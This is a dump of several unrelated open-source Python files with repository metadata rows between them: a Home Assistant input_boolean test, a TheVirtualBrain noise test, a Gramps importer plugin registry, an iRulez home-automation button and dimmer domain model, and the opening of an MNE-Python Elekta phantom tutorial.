import logging
from tests.common import get_test_home_assistant
from homeassistant.bootstrap import setup_component
from homeassistant.components.input_boolean import (
DOMAIN, is_on, toggle, turn_off, turn_on)
from homeassistant.const import (
STATE_ON, STATE_OFF, ATTR_ICON, ATTR_FRIENDLY_NAME)
_LOGGER = logging.getLogger(__name__)
class TestInputBoolean(unittest.TestCase):
"""Test the input boolean module."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_config(self):
"""Test config."""
invalid_configs = [
None,
1,
{},
{'name with space': None},
]
for cfg in invalid_configs:
self.assertFalse(
setup_component(self.hass, DOMAIN, {DOMAIN: cfg}))
def test_methods(self):
"""Test is_on, turn_on, turn_off methods."""
self.assertTrue(setup_component(self.hass, DOMAIN, {DOMAIN: {
'test_1': None,
}}))
entity_id = 'input_boolean.test_1'
self.assertFalse(
is_on(self.hass, entity_id))
turn_on(self.hass, entity_id)
self.hass.block_till_done()
self.assertTrue(
is_on(self.hass, entity_id))
turn_off(self.hass, entity_id)
self.hass.block_till_done()
self.assertFalse(
is_on(self.hass, entity_id))
toggle(self.hass, entity_id)
self.hass.block_till_done()
self.assertTrue(is_on(self.hass, entity_id))
def test_config_options(self):
"""Test configuration options."""
count_start = len(self.hass.states.entity_ids())
_LOGGER.debug('ENTITIES @ start: %s', self.hass.states.entity_ids())
self.assertTrue(setup_component(self.hass, DOMAIN, {DOMAIN: {
'test_1': None,
'test_2': {
'name': 'Hello World',
'icon': 'mdi:work',
'initial': True,
},
}}))
_LOGGER.debug('ENTITIES: %s', self.hass.states.entity_ids())
self.assertEqual(count_start + 2, len(self.hass.states.entity_ids()))
state_1 = self.hass.states.get('input_boolean.test_1')
state_2 = self.hass.states.get('input_boolean.test_2')
self.assertIsNotNone(state_1)
self.assertIsNotNone(state_2)
self.assertEqual(STATE_OFF, state_1.state)
self.assertNotIn(ATTR_ICON, state_1.attributes)
self.assertNotIn(ATTR_FRIENDLY_NAME, state_1.attributes)
self.assertEqual(STATE_ON, state_2.state)
self.assertEqual('Hello World',
state_2.attributes.get(ATTR_FRIENDLY_NAME))
self.assertEqual('mdi:work', state_2.attributes.get(ATTR_ICON))
| mit | -5,577,756,883,282,271,000 | 28.47619 | 77 | 0.593215 | false |
echohenry2006/tvb-library | tvb/tests/library/simulator/noise_test.py | 3 | 2676 | # -*- coding: utf-8 -*-
#
#
# TheVirtualBrain-Scientific Package. This package holds all simulators, and
# analysers necessary to run brain-simulations. You can use it stand alone or
# in conjunction with TheVirtualBrain-Framework Package. See content of the
# documentation-folder for more details. See also http://www.thevirtualbrain.org
#
# (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest")
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the Free
# Software Foundation. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details. You should have received a copy of the GNU General
# Public License along with this program; if not, you can download it here
# http://www.gnu.org/licenses/old-licenses/gpl-2.0
#
#
# CITATION:
# When using The Virtual Brain for scientific publications, please cite it as follows:
#
# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,
# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)
# The Virtual Brain: a simulator of primate brain network dynamics.
# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)
#
#
"""
Test for tvb.simulator.noise module
.. moduleauthor:: Paula Sanz Leon <[email protected]>
"""
if __name__ == "__main__":
from tvb.tests.library import setup_test_console_env
setup_test_console_env()
import unittest
from tvb.tests.library.base_testcase import BaseTestCase
from tvb.simulator import noise
from tvb.datatypes import equations
class NoiseTest(BaseTestCase):
def test_stream(self):
noise_stream = noise.RandomStream()
self.assertEqual(noise_stream.init_seed, 42)
def test_additive(self):
noise_additive = noise.Additive()
self.assertEqual(noise_additive.ntau, 0.0)
def test_multiplicative(self):
noise_multiplicative = noise.Multiplicative()
self.assertEqual(noise_multiplicative.ntau, 0.0)
self.assertTrue(isinstance(noise_multiplicative.b, equations.Linear))
def suite():
"""
Gather all the tests in a test suite.
"""
test_suite = unittest.TestSuite()
test_suite.addTest(unittest.makeSuite(NoiseTest))
return test_suite
if __name__ == "__main__":
#So you can run tests from this package individually.
TEST_RUNNER = unittest.TextTestRunner()
TEST_SUITE = suite()
TEST_RUNNER.run(TEST_SUITE) | gpl-2.0 | 6,864,413,495,467,668,000 | 33.766234 | 86 | 0.71861 | false |
Fedik/gramps | gramps/plugins/importer/import.gpr.py | 4 | 5381 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2009 Benny Malengier
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from gramps.gen.plug._pluginreg import newplugin, STABLE, IMPORT
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
MODULE_VERSION="5.2"
#------------------------------------------------------------------------
#
# Comma _Separated Values Spreadsheet (CSV)
#
#------------------------------------------------------------------------
_mime_type = "text/x-comma-separated-values" # CSV Document
_mime_type_rfc_4180 = "text/csv" # CSV Document See rfc4180 for mime type
plg = newplugin()
plg.id = 'im_csv'
plg.name = _("Comma Separated Values Spreadsheet (CSV)")
plg.description = _("Import data from CSV files")
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importcsv.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "csv"
#------------------------------------------------------------------------
#
# GEDCOM
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_ged'
plg.name = _('GEDCOM')
plg.description = _('GEDCOM is used to transfer data between genealogy programs. '
'Most genealogy software will accept a GEDCOM file as input.')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importgedcom.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "ged"
#------------------------------------------------------------------------
#
# Geneweb
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_geneweb'
plg.name = _('GeneWeb')
plg.description = _('Import data from GeneWeb files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importgeneweb.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "gw"
#------------------------------------------------------------------------
#
# Gramps package (portable XML)
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_gpkg'
plg.name = _('Gramps package (portable XML)')
plg.description = _('Import data from a Gramps package (an archived XML '
'Family Tree together with the media object files.)')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importgpkg.py'
plg.ptype = IMPORT
plg.import_function = 'impData'
plg.extension = "gpkg"
#------------------------------------------------------------------------
#
# Gramps XML database
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_gramps'
plg.name = _('Gramps XML Family Tree')
plg.description = _('The Gramps XML format is a text '
'version of a Family Tree. It is '
'read-write compatible with the '
'present Gramps database format.')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importxml.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "gramps"
#------------------------------------------------------------------------
#
# GRDB database
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_grdb'
plg.name = _('Gramps 2.x database')
plg.description = _('Import data from Gramps 2.x database files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importgrdb.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "grdb"
#------------------------------------------------------------------------
#
# Pro-Gen Files
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_progen'
plg.name = _('Pro-Gen')
plg.description = _('Import data from Pro-Gen files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importprogen.py'
plg.ptype = IMPORT
plg.import_function = '_importData'
plg.extension = "def"
#------------------------------------------------------------------------
#
# vCard
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_vcard'
plg.name = _('vCard')
plg.description = _('Import data from vCard files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importvcard.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "vcf"
| gpl-2.0 | 6,795,835,029,941,055,000 | 29.748571 | 82 | 0.550084 | false |
deklungel/iRulez | src/button/_domain.py | 1 | 29130 | from enum import IntEnum
import src.irulez.util as util
from abc import ABC, abstractmethod
import src.irulez.log as log
from datetime import time
from typing import List, Dict, Optional
import src.irulez.constants as constants
from threading import Timer
logger = log.get_logger('button_domain')
class ArduinoPinType(IntEnum):
"""Represents the purpose of a pin on an arduino"""
BUTTON = 1
OUTPUT = 2
DIMMER = 3
class ActionType(IntEnum):
"""Represents what should happen.
Toggle --> Relay H <-> L,
On --> Relay H,
Off --> Relay L,
Follow_Button --> when button pressed -> relay H,
dimmer --> dimmer"""
TOGGLE = 1
ON = 2
OFF = 3
FOLLOW_BUTTON = 4
ON_DIMMER = 5
OFF_DIMMER = 6
TOGGLE_DIMMER = 7
class ActionTriggerType(IntEnum):
"""Represents when a action need to be executed"""
IMMEDIATELY = 1
AFTER_RELEASE = 2
LONG_DOWN = 3
class Operator(IntEnum):
AND = 1
OR = 2
class ConditionType(IntEnum):
LIST = 1
OUTPUT_PIN = 2
TIME = 3
class ActionTrigger(ABC):
def __init__(self, trigger_type: ActionTriggerType):
self.trigger_type = trigger_type
def get_action_trigger_type(self) -> ActionTriggerType:
return self.trigger_type
class Condition(ABC):
def __init__(self, condition_type: ConditionType):
self.condition_type = condition_type
class Notification(ABC):
def __init__(self, message: str, enabled: False):
self.message = message
self.enabled = enabled
@abstractmethod
def get_topic_name(self) -> str:
pass
@abstractmethod
def get_payload(self) -> str:
pass
class ImmediatelyActionTrigger(ActionTrigger):
def __init__(self) -> None:
super(ImmediatelyActionTrigger, self).__init__(ActionTriggerType.IMMEDIATELY)
class AfterReleaseActionTrigger(ActionTrigger):
def __init__(self) -> None:
super(AfterReleaseActionTrigger, self).__init__(ActionTriggerType.AFTER_RELEASE)
class LongDownActionTrigger(ActionTrigger):
def __init__(self, seconds_down: int):
super(LongDownActionTrigger, self).__init__(ActionTriggerType.LONG_DOWN)
self._seconds_down = seconds_down
@property
def seconds_down(self) -> int:
return self._seconds_down
class Pin(ABC):
"""Represents a pin on an arduino"""
def __init__(self, number: int, pin_type: ArduinoPinType, state=False):
self.number = number
self.pin_type = pin_type
self.state = state
class OutputPin(Pin):
"""Represents a single pin on an arduino"""
def __init__(self, number: int, parent: str, state=False):
"""
Creates a new output pin
:param number: number of this pin on the given arduino
:param parent: name of the arduino
:param state: Initial state
"""
super(OutputPin, self).__init__(number, ArduinoPinType.OUTPUT, state)
self.parent = parent
class IndividualAction:
"""Represents the actions on pins that have to happen on a single arduino"""
def __init__(self,
delay: int,
pin_numbers_on: List[int],
pin_numbers_off: List[int]):
self.delay = delay
self.pin_numbers_on = pin_numbers_on
self.pin_numbers_off = pin_numbers_off
def add_pin_on(self, pin_number: int):
self.pin_numbers_on.append(pin_number)
def add_pin_off(self, pin_number: int):
self.pin_numbers_off.append(pin_number)
def has_values_on(self) -> bool:
if len(self.pin_numbers_on) > 0:
return True
return False
def has_values_off(self) -> bool:
if len(self.pin_numbers_off) > 0:
return True
return False
class IndividualDimAction:
"""Represents a dimmer action for a single arduino"""
def __init__(self,
dim_speed: int,
dim_light_value: int,
delay: int,
cancel_on_button_release: bool):
self.__speed = dim_speed
self.__dim_light_value = dim_light_value
self.__delay = delay
self.__pin_numbers = []
self.__cancel_on_button_release = cancel_on_button_release
def add_pin(self, pin_number: int):
self.__pin_numbers.append(pin_number)
def has_values(self) -> bool:
if len(self.__pin_numbers) > 0:
return True
return False
@property
def speed(self) -> int:
return self.__speed
@property
def dim_light_value(self) -> int:
"""The value the pins should go to"""
return self.__dim_light_value
@property
def delay(self) -> int:
return self.__delay
@property
def pin_numbers(self) -> List[int]:
return self.__pin_numbers
@property
def cancel_on_button_release(self) -> bool:
return self.__cancel_on_button_release
class Action(ABC):
"""Represents a single action"""
def __init__(self,
trigger: ActionTrigger,
action_type: ActionType,
delay: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int):
self.trigger = trigger
self.action_type = action_type
self.delay = delay
self.output_pins = output_pins
self.notifications = notifications
self.condition = condition
self.click_number = click_number
def get_condition(self) -> Condition:
return self.condition
class DimmerAction(Action):
"""Represents a single dimmer action"""
def __init__(self,
trigger: ActionTrigger,
action_type: ActionType,
delay: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int,
dimmer_speed: int,
cancel_on_button_release: bool):
super(DimmerAction, self).__init__(trigger, action_type, delay, output_pins, notifications, condition,
click_number)
self._dimmer_speed = dimmer_speed
self._cancel_on_button_release = cancel_on_button_release
@property
def cancel_on_button_release(self) -> bool:
return self._cancel_on_button_release
class ButtonPin(Pin):
"""Represents a single input pin on an arduino"""
def __init__(self, number: int, actions: List[Action], time_between_clicks, state=False):
self.__actions = actions
self.__long_down_timer = None
self.__multi_click_timer = None
self.__longdown_executed = False
self.__time_between_clicks = time_between_clicks
self.__clicks = 0
self.__dimmer_direction = True
super(ButtonPin, self).__init__(number, ArduinoPinType.BUTTON, state)
def get_button_immediate_actions(self) -> List[Action]:
results = []
for action in self.actions:
if action.trigger.trigger_type == ActionTriggerType.IMMEDIATELY and self.clicks == action.click_number:
results.append(action)
return results
def get_button_after_release_actions(self) -> List[Action]:
results = []
for action in self.actions:
if action.trigger.trigger_type == ActionTriggerType.AFTER_RELEASE and self.clicks == action.click_number:
results.append(action)
return results
def get_smallest_longdown_time(self, minimum_time: int) -> Optional[int]:
longdown_time = None
for action in self.actions:
if action.click_number == self.clicks and action.trigger.trigger_type == ActionTriggerType.LONG_DOWN and \
isinstance(action.trigger, LongDownActionTrigger):
if longdown_time is None and action.trigger.seconds_down > minimum_time:
longdown_time = action.trigger.seconds_down
elif action.trigger.seconds_down > minimum_time:
longdown_time = action.trigger.seconds_down
return longdown_time
def get_button_long_down_actions(self, seconds_down: int) -> List[Action]:
results = []
for action in self.actions:
if action.trigger.trigger_type == ActionTriggerType.LONG_DOWN and \
action.trigger.seconds_down == seconds_down and isinstance(action.trigger, LongDownActionTrigger):
results.append(action)
return results
def has_cancellable_dimmer_actions(self) -> bool:
for action in self.actions:
if isinstance(action, DimmerAction) and action.cancel_on_button_release:
return True
return False
def has_multi_click_actions(self, minimum_click: int) -> bool:
for action in self.actions:
if minimum_click <= action.click_number > 1:
return True
return False
def start_long_down_timer(self, interval: int, function, args: List[object]):
logger.debug(f"Start long down timer")
self.__long_down_timer = Timer(interval, function, args=(args,))
self.__long_down_timer.start()
def stop_long_down_timer(self) -> None:
logger.debug(f"Stop long down timer")
self.__long_down_timer.cancel()
self.__long_down_timer = None
def start_multi_click_timer(self, interval: int, function, args: List[object]):
logger.debug(f"Start multi click timer")
self.__multi_click_timer = Timer(interval, function, args=(args,))
self.__multi_click_timer.start()
def stop_multi_click_timer(self) -> None:
logger.debug(f"Stop multi click timer")
self.__multi_click_timer.cancel()
self.__multi_click_timer = None
def reverse_dimmer_direction(self) -> None:
self.__dimmer_direction = not self.dimmer_direction
@property
def multi_click_timer(self) -> Timer:
return self.__multi_click_timer
@property
def dimmer_direction(self) -> bool:
return self.__dimmer_direction
@dimmer_direction.setter
def dimmer_direction(self, dimmer_direction: bool):
self.__dimmer_direction = dimmer_direction
@property
def time_between_clicks(self) -> float:
return self.__time_between_clicks
@property
def long_down_timer(self) -> Timer:
return self.__long_down_timer
@long_down_timer.setter
def long_down_timer(self, long_down_timer: Timer):
self.__long_down_timer = long_down_timer
@property
def clicks(self) -> int:
return self.__clicks
@clicks.setter
def clicks(self, clicks: int):
self.__clicks = clicks
@property
def actions(self) -> List[Action]:
return self.__actions
@property
def longdown_executed(self) -> bool:
return self.__longdown_executed
@longdown_executed.setter
def longdown_executed(self, longdown_executed: bool):
self.__longdown_executed = longdown_executed
class Arduino:
"""Represents an actual arduino"""
def __init__(self, name: str, number_of_outputs_pins: int, number_of_button_pins: int):
self.name = name
self.number_of_output_pins = number_of_outputs_pins
self.number_of_button_pins = number_of_button_pins
self.__output_pins = dict()
self._button_pins = dict()
@property
def button_pins(self) -> Dict[int, ButtonPin]:
return self._button_pins
@property
def output_pins(self) -> Dict[int, OutputPin]:
return self.__output_pins
def set_output_pin(self, output_pin: OutputPin):
self.output_pins[output_pin.number] = output_pin
def set_output_pins(self, output_pins: List[OutputPin]):
for pin in output_pins:
self.output_pins[pin.number] = pin
def set_button_pin(self, button_pin: ButtonPin):
self._button_pins[button_pin.number] = button_pin
def set_button_pins(self, button_pins: List[ButtonPin]):
for pin in button_pins:
self._button_pins[pin.number] = pin
def get_output_pin(self, pin_number: int) -> OutputPin:
return self.output_pins[pin_number]
def get_changed_pins(self, payload: str) -> Dict[int, bool]:
status = util.convert_hex_to_array(payload, self.number_of_output_pins)
changed_pins = dict()
for pin in self._button_pins.values():
if bool(int(status[pin.number])) != pin.state:
changed_pins[pin.number] = bool(int(status[pin.number]))
pin.state = bool(int(status[pin.number]))
return changed_pins
class IndividualRealTimeDimAction(IndividualAction):
"""Represents a dimmer action for a single arduino"""
def __init__(self,
dim_speed: int,
dim_light_value: int,
delay: int,
pin_numbers_on: List[int],
pin_numbers_off: List[int],
arduino: Arduino,
button: ButtonPin):
super(IndividualAction).__init__(delay, pin_numbers_on, pin_numbers_off)
self.speed = dim_speed
self.dim_light_value = dim_light_value
self.arduino = arduino
self.button = button
class MailNotification(Notification):
def __init__(self, message: str, subject: str, mails: List[str], enabled=False):
super(MailNotification, self).__init__(message, enabled)
self.mails = mails
self.subject = subject
def get_topic_name(self) -> str:
return constants.iRulezTopic + "/" + constants.notificationTopic + "/" + constants.mailTopic
def get_payload(self) -> str:
return util.serialize_json(
{
"mails": self.mails,
"message": self.message,
"subject": self.subject
})
class TelegramNotification(Notification):
def __init__(self, message: str, tokens: List[str], enabled=False):
super(TelegramNotification, self).__init__(message, enabled)
self.tokens = tokens
def get_topic_name(self) -> str:
return constants.iRulezTopic + "/" + constants.notificationTopic + "/" + constants.telegramTopic
def get_payload(self) -> str:
return util.serialize_json(
{
"tokens": self.tokens,
"message": self.message
})
class ConditionList(Condition):
def __init__(self, operator: Operator, conditions: List[Condition]):
super(ConditionList, self).__init__(ConditionType.LIST)
self.operator = operator
self.conditions = conditions
class OutputPinCondition(Condition):
def __init__(self, output_pin: OutputPin, status: bool):
super(OutputPinCondition, self).__init__(ConditionType.OUTPUT_PIN)
self.output_pin = output_pin
self.status = status
class TimeCondition(Condition):
def __init__(self, from_time: time, to_time: time):
super(TimeCondition, self).__init__(ConditionType.TIME)
self.from_time = from_time
self.to_time = to_time
class OnAction(Action):
def __init__(self,
trigger: ActionTrigger,
delay: int,
off_timer: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int):
self.off_timer = off_timer
super(OnAction, self).__init__(trigger, ActionType.ON, delay, output_pins, notifications,
condition, click_number)
def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]]):
temp_pin_actions = {}
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.delay, [], [])
pin_action.add_pin_on(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_on(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_on():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
if self.off_timer > 0:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.off_timer, [], [])
pin_action.add_pin_off(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_off(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_off():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
class OffAction(Action):
def __init__(self,
trigger: ActionTrigger,
delay: int,
on_timer: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int):
self.on_timer = on_timer
super(OffAction, self).__init__(trigger, ActionType.OFF, delay, output_pins, notifications,
condition, click_number)
def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]]):
temp_pin_actions = {}
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.delay, [], [])
pin_action.add_pin_off(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_off(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_off():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
if self.on_timer > 0:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.on_timer, [], [])
pin_action.add_pin_on(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_on(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_on():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
class ToggleAction(Action):
def __init__(self,
trigger: ActionTrigger,
delay: int,
output_pins: List[OutputPin],
notifications: List[Notification],
master: OutputPin,
condition: Optional[Condition],
click_number: int):
super(ToggleAction, self).__init__(trigger, ActionType.TOGGLE, delay, output_pins, notifications,
condition, click_number)
self.master = master
def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]], master: bool):
# if master is on put all the lights of and visa versa
temp_pin_actions = {}
if master:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.delay, [], [])
pin_action.add_pin_off(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_off(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_off():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
else:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.delay, [], [])
pin_action.add_pin_on(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_on(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_on():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
class OnDimmerAction(DimmerAction):
def __init__(self,
trigger: ActionTrigger,
delay: int,
off_timer: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int,
dimmer_speed: int,
dimmer_light_value: int,
cancel_on_button_release: bool,
master_dim_id: int):
self.__off_timer = off_timer
self.__dimmer_light_value = dimmer_light_value
self.__master_dim_id = master_dim_id
super(OnDimmerAction, self).__init__(trigger, ActionType.ON_DIMMER, delay, output_pins, notifications,
condition, click_number, dimmer_speed, cancel_on_button_release)
def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]]):
temp_pin_actions = {}
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
if self.__dimmer_light_value is None:
self.__dimmer_light_value = 100
pin_action = IndividualDimAction(self._dimmer_speed, self.__dimmer_light_value, self.delay,
self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
if self.__off_timer > 0:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, 0, self.__off_timer,
self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
class OffDimmerAction(DimmerAction):
def __init__(self,
trigger: ActionTrigger,
delay: int,
on_timer: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int,
dimmer_speed: int,
cancel_on_button_release: bool):
self.__on_timer = on_timer
super(OffDimmerAction, self).__init__(trigger, ActionType.OFF_DIMMER, delay, output_pins, notifications,
condition, click_number, dimmer_speed, cancel_on_button_release)
def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]]):
temp_pin_actions = {}
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, 0, self.delay, self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
if self.__on_timer > 0:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, 0, self.__on_timer,
self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
class ToggleDimmerAction(DimmerAction):
def __init__(self,
trigger: ActionTrigger,
delay: int,
output_pins: List[OutputPin],
notifications: List[Notification],
master: OutputPin,
condition: Optional[Condition],
click_number: int,
dimmer_speed: int,
dimmer_light_value: int,
cancel_on_button_release: bool,
master_dim_id: Optional[int]):
super(ToggleDimmerAction, self).__init__(trigger, ActionType.TOGGLE_DIMMER, delay, output_pins, notifications,
condition, click_number, dimmer_speed, cancel_on_button_release)
self.master = master
self.__dimmer_light_value = dimmer_light_value
self.__master_dim_id = master_dim_id
@property
def master_dim_id(self) -> Optional[int]:
return self.__master_dim_id
def perform_action(self,
pin_to_dim: Dict[str, List[IndividualDimAction]],
last_light_values_to_update: Dict[int, int],
master_state: int,
master_direction: str,
last_light_value: int):
temp_pin_actions = {}
# If master is off, start turning all lights on, regardless of button pressed or button longdown
# If cancel_on_button_release is set to true and last dim direction was down, we start dimming up
# If master_state is 100, start turning all lights off
logger.debug(f"{master_state}, {self.cancel_on_button_release}, {master_direction}")
if master_state == 0 or \
(self.cancel_on_button_release and
master_direction == constants.dim_direction_down and
master_state != 100):
# If __dimmer_light_value is configured, use that value. Otherwise use the last known value
light_value_to_set = self.__dimmer_light_value
if light_value_to_set == -1:
light_value_to_set = last_light_value
logger.debug(f"{light_value_to_set}")
# Generate dim actions for each impacted pin
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, light_value_to_set, self.delay,
self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
# If master is on and cancel_on_button_release is false or last dim direction was up, we start dimming down
else:
if not self.cancel_on_button_release:
last_light_values_to_update.setdefault(self.master_dim_id, master_state)
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, 0, self.delay, self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
class ArduinoConfig:
"""Represents the configuration of all known arduinos"""
def __init__(self, arduinos: List[Arduino]):
self.arduinos = arduinos
| mit | -6,083,037,248,677,932,000 | 36.250639 | 119 | 0.576141 | false |
wmvanvliet/mne-python | tutorials/sample-datasets/plot_brainstorm_phantom_elekta.py | 10 | 6588 | # -*- coding: utf-8 -*-
"""
.. _tut-brainstorm-elekta-phantom:
==========================================
Brainstorm Elekta phantom dataset tutorial
==========================================
Here we compute the evoked from raw for the Brainstorm Elekta phantom
tutorial dataset. For comparison, see :footcite:`TadelEtAl2011` and:
https://neuroimage.usc.edu/brainstorm/Tutorials/PhantomElekta
References
----------
.. footbibliography::
"""
# sphinx_gallery_thumbnail_number = 9
# Authors: Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import numpy as np
import matplotlib.pyplot as plt
import mne
from mne import find_events, fit_dipole
from mne.datasets.brainstorm import bst_phantom_elekta
from mne.io import read_raw_fif
print(__doc__)
###############################################################################
# The data were collected with an Elekta Neuromag VectorView system at 1000 Hz
# and low-pass filtered at 330 Hz. Here the medium-amplitude (200 nAm) data
# are read to construct instances of :class:`mne.io.Raw`.
data_path = bst_phantom_elekta.data_path(verbose=True)
subject = 'sample'
raw_fname = op.join(data_path, 'kojak_all_200nAm_pp_no_chpi_no_ms_raw.fif')
raw = read_raw_fif(raw_fname)
###############################################################################
# Data channel array consisted of 204 MEG planor gradiometers,
# 102 axial magnetometers, and 3 stimulus channels. Let's get the events
